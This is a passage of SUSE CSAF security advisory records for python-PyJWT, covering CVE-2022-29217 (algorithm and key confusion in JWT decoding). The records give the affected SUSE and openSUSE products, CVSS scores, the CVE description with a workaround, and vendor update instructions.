"SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server for SAP Applications 15 SP3", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Manager Proxy 4.2", product_id: "SUSE Manager Proxy 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Manager Proxy 4.2", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Manager Server 4.2", product_id: "SUSE Manager Server 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Manager Server 4.2", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Enterprise Storage 7", product_id: "SUSE Enterprise Storage 7:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Enterprise Storage 7", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of SUSE Enterprise Storage 7.1", product_id: "SUSE Enterprise Storage 7.1:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "SUSE Enterprise Storage 7.1", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-2.4.0-150200.3.6.2.noarch as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", }, product_reference: "python3-PyJWT-2.4.0-150200.3.6.2.noarch", relates_to_product_reference: "openSUSE Leap 15.4", }, ], }, vulnerabilities: [ { cve: "CVE-2022-29217", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29217", }, ], notes: [ { category: "general", text: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Enterprise Storage 7.1:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Enterprise Storage 7:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Real Time 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Manager Proxy 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Manager Server 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "openSUSE Leap 15.4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", ], }, references: [ { category: "external", summary: "CVE-2022-29217", url: "https://www.suse.com/security/cve/CVE-2022-29217", }, { category: "external", summary: "SUSE Bug 1199756 for CVE-2022-29217", url: "https://bugzilla.suse.com/1199756", }, { category: "external", summary: "SUSE Bug 1223417 for CVE-2022-29217", url: "https://bugzilla.suse.com/1223417", }, { category: "external", summary: "SUSE Bug 1226138 for CVE-2022-29217", url: "https://bugzilla.suse.com/1226138", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Enterprise Storage 7.1:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Enterprise Storage 7:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Real Time 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Manager Proxy 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Manager Server 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "openSUSE Leap 15.4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Enterprise Storage 7.1:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Enterprise Storage 7:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Real Time 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server 15 SP3-LTSS:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP3:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Manager Proxy 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "SUSE Manager Server 4.2:python3-PyJWT-2.4.0-150200.3.6.2.noarch", "openSUSE Leap 15.4:python3-PyJWT-2.4.0-150200.3.6.2.noarch", ], }, ], threats: [ { category: "impact", date: "2023-03-17T07:42:24Z", details: "important", }, ], title: "CVE-2022-29217", }, ], }
suse-su-2022:2402-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-PyJWT", title: "Title of the patch", }, { category: "description", text: "This update for python-PyJWT fixes the following issues:\n\n- CVE-2022-29217: Fixed key confusion through non-blocklisted public key format (bsc#1199756).\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2022-2402,SUSE-SLE-Module-Basesystem-15-SP3-2022-2402,SUSE-SLE-Module-Basesystem-15-SP4-2022-2402,SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2022-2402,SUSE-SLE-Product-HPC-15-SP2-ESPOS-2022-2402,SUSE-SLE-Product-HPC-15-SP2-LTSS-2022-2402,SUSE-SLE-Product-SLES-15-SP2-BCL-2022-2402,SUSE-SLE-Product-SLES-15-SP2-LTSS-2022-2402,SUSE-SLE-Product-SLES_SAP-15-SP2-2022-2402,SUSE-SLE-Product-SUSE-Manager-Proxy-4.1-2022-2402,SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.1-2022-2402,SUSE-SLE-Product-SUSE-Manager-Server-4.1-2022-2402,SUSE-Storage-7-2022-2402,openSUSE-SLE-15.3-2022-2402,openSUSE-SLE-15.4-2022-2402", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2022_2402-1.json", }, { category: "self", summary: "URL for SUSE-SU-2022:2402-1", url: "https://www.suse.com/support/update/announcement/2022/suse-su-20222402-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2022:2402-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-July/011552.html", }, { category: "self", summary: "SUSE Bug 1199756", url: "https://bugzilla.suse.com/1199756", }, { category: "self", summary: "SUSE CVE CVE-2022-29217 page", url: "https://www.suse.com/security/cve/CVE-2022-29217/", }, ], title: "Security update for python-PyJWT", tracking: { current_release_date: "2022-07-14T14:58:57Z", generator: { date: "2022-07-14T14:58:57Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2022:2402-1", initial_release_date: "2022-07-14T14:58:57Z", revision_history: [ { date: "2022-07-14T14:58:57Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-PyJWT-1.7.1-150200.3.3.1.noarch", product: { name: "python2-PyJWT-1.7.1-150200.3.3.1.noarch", product_id: "python2-PyJWT-1.7.1-150200.3.3.1.noarch", }, }, { category: "product_version", name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", product: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", product_id: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP4", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP4", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP4", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp4", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product: { name: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:packagehub:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-espos:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product: { name: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sle_hpc-ltss:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server 15 SP2-BCL", product: { name: "SUSE Linux Enterprise Server 15 SP2-BCL", product_id: "SUSE Linux Enterprise Server 15 SP2-BCL", product_identification_helper: { cpe: "cpe:/o:suse:sles_bcl:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server 15 SP2-LTSS", product: { name: "SUSE Linux Enterprise Server 15 SP2-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP2-LTSS", product_identification_helper: { cpe: "cpe:/o:suse:sles-ltss:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", product: { name: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:sles_sap:15:sp2", }, }, }, { category: "product_name", name: "SUSE Manager Proxy 4.1", product: { name: "SUSE Manager Proxy 4.1", product_id: "SUSE Manager Proxy 4.1", product_identification_helper: { cpe: "cpe:/o:suse:suse-manager-proxy:4.1", }, }, }, { category: "product_name", name: "SUSE Manager Retail Branch Server 4.1", product: { name: "SUSE Manager Retail Branch Server 4.1", product_id: "SUSE Manager Retail Branch Server 4.1", product_identification_helper: { cpe: "cpe:/o:suse:suse-manager-retail-branch-server:4.1", }, }, }, { category: "product_name", name: "SUSE Manager Server 4.1", product: { name: "SUSE Manager Server 4.1", product_id: "SUSE Manager Server 4.1", product_identification_helper: { cpe: "cpe:/o:suse:suse-manager-server:4.1", }, }, }, { category: "product_name", name: "SUSE Enterprise Storage 7", product: { name: "SUSE Enterprise Storage 7", product_id: "SUSE Enterprise Storage 7", product_identification_helper: { cpe: "cpe:/o:suse:ses:7", }, }, }, { category: "product_name", name: "openSUSE Leap 15.3", product: { name: "openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.3", }, }, }, { category: "product_name", name: "openSUSE Leap 15.4", product: { name: "openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.4", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP3", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP3", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP4", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP4", }, { category: "default_component_of", full_product_name: { name: "python2-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP3", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python2-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Package Hub 15 SP3", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", product_id: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise Server 15 SP2-BCL", product_id: "SUSE Linux Enterprise Server 15 SP2-BCL:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server 15 SP2-BCL", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise Server 15 SP2-LTSS", product_id: "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server 15 SP2-LTSS", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP2", product_id: "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Server for SAP Applications 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Manager Proxy 4.1", product_id: "SUSE Manager Proxy 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Manager Proxy 4.1", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Manager Retail Branch Server 4.1", product_id: "SUSE Manager Retail Branch Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Manager Retail Branch Server 4.1", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Manager Server 4.1", product_id: "SUSE Manager Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Manager Server 4.1", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of SUSE Enterprise Storage 7", product_id: "SUSE Enterprise Storage 7:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "SUSE Enterprise Storage 7", }, { category: "default_component_of", full_product_name: { name: "python2-PyJWT-1.7.1-150200.3.3.1.noarch as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python2-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "python3-PyJWT-1.7.1-150200.3.3.1.noarch as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", }, product_reference: "python3-PyJWT-1.7.1-150200.3.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.4", }, ], }, vulnerabilities: [ { cve: "CVE-2022-29217", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29217", }, ], notes: [ { category: "general", text: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Enterprise Storage 7:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server 15 SP2-BCL:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Proxy 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Retail Branch Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2022-29217", url: "https://www.suse.com/security/cve/CVE-2022-29217", }, { category: "external", summary: "SUSE Bug 1199756 for CVE-2022-29217", url: "https://bugzilla.suse.com/1199756", }, { category: "external", summary: "SUSE Bug 1223417 for CVE-2022-29217", url: "https://bugzilla.suse.com/1223417", }, { category: "external", summary: "SUSE Bug 1226138 for CVE-2022-29217", url: "https://bugzilla.suse.com/1226138", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Enterprise Storage 7:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server 15 SP2-BCL:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Proxy 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Retail Branch Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Enterprise Storage 7:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server 15 SP2-BCL:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server 15 SP2-LTSS:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Linux Enterprise Server for SAP Applications 15 SP2:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Proxy 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Retail Branch Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "SUSE Manager Server 4.1:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.3:python2-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.3:python3-PyJWT-1.7.1-150200.3.3.1.noarch", "openSUSE Leap 15.4:python3-PyJWT-1.7.1-150200.3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2022-07-14T14:58:57Z", details: "important", }, ], title: "CVE-2022-29217", }, ], }
suse-su-2022:2403-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-PyJWT", title: "Title of the patch", }, { category: "description", text: "This update for python-PyJWT fixes the following issues:\n\n- CVE-2022-29217: Fixed key confusion through non-blocklisted public key format (bsc#1199756).\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2022-2403,SUSE-SLE-Module-Public-Cloud-15-SP1-2022-2403,SUSE-SLE-Module-Public-Cloud-15-SP2-2022-2403,SUSE-SLE-Product-HPC-15-SP1-ESPOS-2022-2403,SUSE-SLE-Product-HPC-15-SP1-LTSS-2022-2403,SUSE-SLE-Product-SLES-15-SP1-BCL-2022-2403,SUSE-SLE-Product-SLES-15-SP1-LTSS-2022-2403,SUSE-SLE-Product-SLES_SAP-15-SP1-2022-2403,SUSE-Storage-6-2022-2403", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2022_2403-1.json", }, { category: "self", summary: "URL for SUSE-SU-2022:2403-1", url: "https://www.suse.com/support/update/announcement/2022/suse-su-20222403-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2022:2403-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-July/011549.html", }, { category: "self", summary: "SUSE Bug 1199756", url: "https://bugzilla.suse.com/1199756", }, { category: "self", summary: "SUSE CVE CVE-2022-29217 page", url: "https://www.suse.com/security/cve/CVE-2022-29217/", }, ], 